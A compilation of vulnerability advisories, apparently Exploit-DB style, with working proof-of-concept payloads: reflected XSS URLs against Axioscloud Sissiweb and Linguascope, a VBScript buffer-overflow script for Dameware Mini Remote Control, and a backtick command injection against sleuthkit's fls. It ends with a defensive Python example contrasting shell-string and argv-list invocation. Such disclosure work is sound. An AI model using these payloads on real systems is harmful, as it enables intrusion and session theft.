Axioscloud Sissiweb Registro Elettronico - 'Error_desc' Reflected Cross-Site Scripting

# Date: 2018-10-11
# Vendor Homepage: http://axiositalia.it/
# Software Link: http://axiositalia.it/?page_id=1907
# Version: 1.7.0/7.0.0
# Category: Webapps
# Platform: ASPX
# CVE-2018-18437
# POC:
# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters=


Linguascope Language Learning Platform - 'Activity' Reflected Cross-Site Scripting

# Date: 2018-11-24
# Vendor Homepage: https://www.linguascope.com
# Category: Webapps
# Platform: PHP
# POC:
# https://www.linguascope.com/secure/students/elementary/html5/bin/main.php?language=english&activity=%22/%3E%3Cscript%3Ealert(%27Hacked%27)%3C/script%3E%3C%22


Dameware Mini Remote Control 10.0 - Buffer Overflow / Denial of Service CVE-2019-9017

# Date: 2019-02-22
# Vendor: Solarwinds
# Tested on: Windows 7 SP1 x64
# CVE ID: CVE-2019-9017
# POC in VB Script
option explicit
dim fold, exe, buf, i, wsh, fso, result
exe = "DWRCC.exe"
fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64 #1\"
' Build the long run of "A" characters passed as the -m: value
for i = 0 to 300
    buf = buf & "A"
next
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
' Run only if the install folder exists
if fso.folderexists(fold) then
    fold = fold & exe
    fold = chr(34) & fold & chr(34)   ' quote the path because it contains spaces
    result = wsh.run(fold & " -c: -h: -m:" & buf, 0, true)
end if


OS Command injection vulnerability in sleuthkit fls tool CVE-2022-45639

# Date: 2023-01-20
# CVE-2022-45639
# Vendor Homepage: https://github.com/sleuthkit
# Vulnerability Type: Command injection
# Attack Type: Local
# Version: 4.11.1
# Authors: Dino Barlattani, Giuseppe Granato
# POC:

The fls tool is affected by command injection in the "-m" parameter when run on a Linux system.
An OS command injection vulnerability in the sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands
via a crafted value passed to the -m parameter.

When fls runs on Linux, a user can insert in the -m parameter a buffer containing a shell command enclosed in backticks.
If fls is run with a web application as its front end, it can execute commands on the remote server.

The function affected by the vulnerability is "tsk_fs_fls()" in the "fls_lib.c" file:

#ifdef TSK_WIN32
   {
   ....
   }
#else

   data.macpre = tpre; <---------------

   return tsk_fs_dir_walk(fs, inode, flags, print_dent_act, &data);

#endif

Run command:

$ fls -m `id` [Options]
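
For the web front end case described above, an added example (not code from this advisory or from the Sleuth Kit project) showing the weak way and the corrected way for a front end to hand a user-supplied -m value to the tool. The stand-in command that replaces fls, the allow-list pattern and the function names are assumptions made so the example runs without Sleuth Kit installed.

```python
import re
import shlex
import subprocess
import sys

# Stand-in for the fls binary (assumption, so this runs without Sleuth Kit):
# it prints the value it received after "-m".
STAND_IN = [sys.executable, "-c", "import sys; print(sys.argv[2])"]

# Hypothetical front-end policy for the -m mount-point prefix.
SAFE_PREFIX = re.compile(r"[A-Za-z0-9_./-]{1,255}")


def run_via_shell(prefix):
    """Weak pattern: the request value is pasted into a shell command line,
    so /bin/sh performs command substitution before the tool starts."""
    cmd = shlex.join(STAND_IN) + " -m " + prefix
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout.strip()


def run_via_argv(prefix, validate=True):
    """Corrected pattern: no shell, one argv element per argument, and the
    prefix is checked against an allow-list before anything is started."""
    if validate and (prefix.startswith("-") or not SAFE_PREFIX.fullmatch(prefix)):
        raise ValueError("rejected -m value: %r" % prefix)
    argv = STAND_IN + ["-m", prefix]
    done = subprocess.run(argv, capture_output=True, text=True, check=True)
    return done.stdout.strip()


if __name__ == "__main__":
    crafted = "/mnt/`echo INJECTED`"      # constructed sample input
    print("shell string :", run_via_shell(crafted))
    print("argv list    :", run_via_argv(crafted, validate=False))
    try:
        run_via_argv(crafted)
    except ValueError as err:
        print("with policy  :", err)
```

With the argv list the backticks reach the program as literal characters; the allow-list then refuses the value before any process is started.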







 
 





